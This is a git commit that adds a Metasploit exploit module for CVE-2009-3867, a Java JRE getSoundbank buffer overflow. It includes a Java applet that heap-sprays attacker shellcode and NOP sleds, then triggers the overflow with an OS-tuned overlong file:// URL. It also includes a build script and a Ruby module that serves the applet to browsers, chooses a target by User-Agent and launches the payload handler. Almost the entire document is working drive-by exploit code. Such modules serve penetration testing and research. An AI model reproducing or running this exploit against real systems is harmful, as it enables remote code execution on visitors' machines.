add exploit module for CVE-2009-3867 (JRE getSoundbank)

git-svn-id: file:///home/svn/framework3/trunk@7827 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-11 21:18:31 +00:00 · 2009-12-11 21:18:31 +00:00 · 34408c5e3e
parent 740fd67b74
commit 34408c5e3e
4 changed files with 368 additions and 0 deletions
--- a/data/exploits/CVE-2009-3867.jar
+++ b/data/exploits/CVE-2009-3867.jar
--- a/external/source/exploits/CVE-2009-3867/AppletX.java
+++ b/external/source/exploits/CVE-2009-3867/AppletX.java
@ -0,0 +1,142 @@
+
+import javax.sound.midi.*;
+import java.io.*;
+import java.nio.*;
+import java.net.*;
+
+/*
+ * 
+ * comments from KF on Mac OS X:
+ * 
+Spray heap
+
+Invalid memory access of location 0000000f eip=90909090
+
+Program received signal EXC_BAD_ACCESS, Could not access memory.
+Reason: KERN_PROTECTION_FAILURE at address: 0x0000000f
+[Switching to process 385 thread 0x15107]
+0x90909090 in _NSReadAttributedStringFromURLOrData ()
+(gdb) bt
+#0  0x90909090 in _NSReadAttributedStringFromURLOrData ()
+#1  0x255a255a in ?? ()
+ * 
+ */
+
+public class AppletX extends java.applet.Applet 
+{
+	private IntBuffer [] mem;
+	
+	public void init() 
+	  {
+		  String fName = "";
+		  
+		  fName = repeat('/', 303);
+
+		  // detect OS
+		  String os = System.getProperty("os.name").toLowerCase();
+		  if (os.indexOf( "win" ) >= 0)
+			 fName = repeat('/', 302); // 1.6.0_u16,u11
+		  	 // fName = repeat('/', 304); // 1.5.0_u21 (problems lurking)
+		  else if (os.indexOf( "mac" ) >= 0)
+			 //fName = repeat('/',1118); // OSX Snow Leopard
+			 fName = repeat('/',1080); // OSX Leopard
+		  else if (os.indexOf( "nix") >=0 || os.indexOf( "nux") >=0)
+			 fName = repeat('/', 1337); // not tested
+		  else
+			 // not supported
+			 return;
+		  
+		  // heap sprayed info starts at 0x25580000+12 but we need to be fairly ascii safe. 0x80 will not fly
+		  // fName = "file://" + fName + "$\"$\"$\"$\"$\"$\""; // 1.5.x
+		  fName = "file://" + fName + "Z%Z%Z%Z%Z%Z%";
+		  
+		  // trigger vuln
+		  try
+			 {
+				 mem = spray(getParameter("sc"), getParameter("np"));
+				 // System.out.println("Sprayed!");
+
+				 MidiSystem.getSoundbank(new URL(fName));
+				 
+				 // just in case, thread doesn't typically return from above :)
+				 while (true)
+					{
+						Thread.sleep(10);
+					}
+			 }
+		  catch(Exception e)
+			 {
+				 System.out.println(e);
+			 }
+	  }
+	
+	
+	public static String repeat(char c,int i)
+	  {
+		  String tst = "";
+
+		  for (int j = 0; j < i; j++)
+			 {
+				 tst = tst+c;
+			 }
+		  return tst;
+	  }
+
+
+   // based on:
+	// http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java
+	public static short[] HexDecode(String s)
+	  {
+		  short[] data = new short[s.length()/2];
+		  
+		  for (int i = 0; i < s.length(); i += 2)
+			 {
+				 char c1 = s.charAt(i);
+				 char c2 = s.charAt(i + 1);
+				 
+				 int comb = Character.digit(c1, 16) & 0xff;
+				 comb <<= 4;
+				 comb += Character.digit(c2, 16) & 0xff;
+				 data[i/2] = (short)comb;
+			 }
+		  return data;
+	  }
+	
+	public final IntBuffer [] spray(String sc, String np)
+	  {
+		  short [] sc_bytes = HexDecode(sc);
+		  short [] np_bytes = HexDecode(np);
+		  
+		  return spray (sc_bytes, np_bytes);
+	  }
+	
+	public final IntBuffer [] spray(short[] sc, short[] np)
+	  {
+		  int cnt = 50; // total 50 mb
+		  int sz = 1024*1024; // 1 mb
+		  int nops = (sz / 4) - (sc.length);
+		  
+		  IntBuffer [] ret = new IntBuffer[cnt];
+		  
+		  for (int bi = 0; bi < cnt; bi++)
+			 {
+				 IntBuffer ib = IntBuffer.allocate(sz / 4);
+
+				 for (int i = 0; i < nops; ++i)
+					ib.put((np[0]
+							  | (np[1] << 8)
+							  | (np[2] << 16)
+							  | (np[3] << 24)));
+				 // ib.put(0x90909090);
+		  
+				 for (int i = 0; i < sc.length; )
+					ib.put((sc[i++]
+							  | (sc[i++] << 8)
+							  | (sc[i++] << 16)
+							  | (sc[i++] << 24)));
+				 ret[bi] = ib;
+			 }
+		  return ret;
+	  }
+}
+
--- a/external/source/exploits/CVE-2009-3867/compile.sh
+++ b/external/source/exploits/CVE-2009-3867/compile.sh
@ -0,0 +1,8 @@
+#!/bin/sh
+
+javac AppletX.java
+
+jar cvf CVE-2009-3867.jar AppletX.class
+rm -f AppletX.class
+
+mv CVE-2009-3867.jar ../../../../data/exploits/CVE-2009-3867.jar
--- a/modules/exploits/multi/browser/java_getsoundbank_bof.rb
+++ b/modules/exploits/multi/browser/java_getsoundbank_bof.rb
@ -0,0 +1,218 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	#
+	# This module acts as an HTTP server
+	#
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a flaw in the getSoundbank function in the Sun JVM.
+				
+				The payload is serialized and passed to the applet via PARAM tags. It must be
+				a native payload.
+				
+				The effected Java versions are JDK and JRE 6 Update 16 and earlier, 
+				JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and 
+				earlier, and SDK and JRE 1.3.1_26 and earlier.
+				
+				NOTE: Although all of the above versions are reportedly vulnerable, only
+				1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>  
+				[
+					'kf',      # Original PoC/exploit
+					'jduck'    # metasploit version
+				],
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
+					[ 'CVE', '2009-3867' ],
+					[ 'OSVDB', '59711' ],
+	  				[ 'BID', '36881' ],
+					[ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-09-076/' ]
+				],
+			'Payload'        =>
+				{
+					'Space'    => 1024,
+					'BadChars' => '',
+					'DisableNops' => true,
+				},
+			'Targets'        =>
+				[
+					[ 'J2SE 1.6_16 Automatic', 
+						{
+							'Platform' => ['win', 'linux', 'osx'],
+							'Arch' => [ARCH_X86, ARCH_PPC]
+						}
+					],
+					[ 'J2SE 1.6_16 on Windows x86', 
+						{
+							'Platform' => 'win',
+							'Arch' => ARCH_X86
+						}
+					],
+					[ 'J2SE 1.6_16 on Mac OS X PPC', 
+						{
+							'Platform' => 'osx',
+							'Arch' => ARCH_PPC,
+						}
+					],
+					[ 'J2SE 1.6_16 on Mac OS X x86', 
+						{
+							'Platform' => 'osx',
+							'Arch' => ARCH_X86,
+						}
+					],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Nov 04 2009'
+			))
+	end
+	
+	
+	def on_request_uri(cli, req)
+		
+		# Create a cached mapping between IP and detected target
+		@targetcache ||= {}
+		@targetcache[cli.peerhost] ||= {}
+		@targetcache[cli.peerhost][:update] = Time.now.to_i
+
+		if (target.name =~ /Automatic/) 
+			case req.headers['User-Agent']
+			when /Windows/i
+				print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...")
+				@targetcache[cli.peerhost][:target] = self.targets[1]
+			when /PPC Mac OS X/i
+				print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...")
+				@targetcache[cli.peerhost][:target] = self.targets[2]			
+			when /Intel Mac OS X/i
+				print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...")
+				@targetcache[cli.peerhost][:target] = self.targets[3]
+			else
+				print_status("Unknown target for: #{req.headers['User-Agent']}")
+			end
+		end
+
+		# Clean the cache 
+		rmq = []
+		@targetcache.each_key do |addr|
+			if (Time.now.to_i > @targetcache[addr][:update]+60)
+				rmq.push addr
+			end
+		end
+				
+		rmq.each {|addr| @targetcache.delete(addr) }
+	
+	
+		# Request processing
+		if (not req.uri.match(/\.jar$/i))
+		
+			# Redirect to the base directory so the applet code loads...
+			if (not req.uri.match(/\/$/))
+				print_status("Sending redirect so path ends with / ...")
+				send_redirect(cli, get_resource() + '/', '')
+				return
+			end
+		
+			# Display the applet loading HTML
+			print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
+			send_response_html(cli, generate_html(payload.encoded),
+				{
+					'Content-Type' => 'text/html',
+					'Pragma' => 'no-cache'
+				})
+			return
+		end
+		
+		# Send the actual applet over
+		print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...")
+		send_response(cli, generate_applet(cli, req), 
+			{
+				'Content-Type' => 'application/octet-stream',
+				'Pragma' => 'no-cache'
+			})
+
+		# Handle the payload
+		handler(cli)
+	end
+
+
+	def generate_html(pl)
+
+		html = %Q|<html>
+ <head>
+  <!-- <meta http-equiv=refresh content=10 /> -->
+ </head>
+ <body>
+  <applet width='100%' height='100%' code='AppletX' archive='CVE-2009-3867.jar'5>
+   <param name='sc' value='SCODE' />
+   <param name='np' value='NOPS' />
+  </applet>
+ </body>
+</html>
+|
+		# ugh.. pain
+		debug_payload = false
+		pload = ""
+		pload << "\xcc" if debug_payload
+		pload << pl
+		if ((pload.length % 4) > 0)
+			pload << rand_text((4 - (pload.length % 4)))
+		end
+		if debug_payload
+			print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
+		end
+		html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))
+		
+		nops = "\x90\x90\x90\x90"
+		html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
+		#print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))
+		
+		return html
+
+	end
+
+
+	def generate_applet(cli, req)
+
+		this_target = nil
+		if (target.name =~ /Automatic/) 
+			if (@targetcache[cli.peerhost][:target])
+				this_target = @targetcache[cli.peerhost][:target]
+			else
+				return ''
+			end
+		else
+			this_target = target
+		end
+
+		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3867.jar")
+
+		fd = File.open(path, "rb")
+		data = fd.read
+		fd.close
+		
+		return data
+	end	
+
+end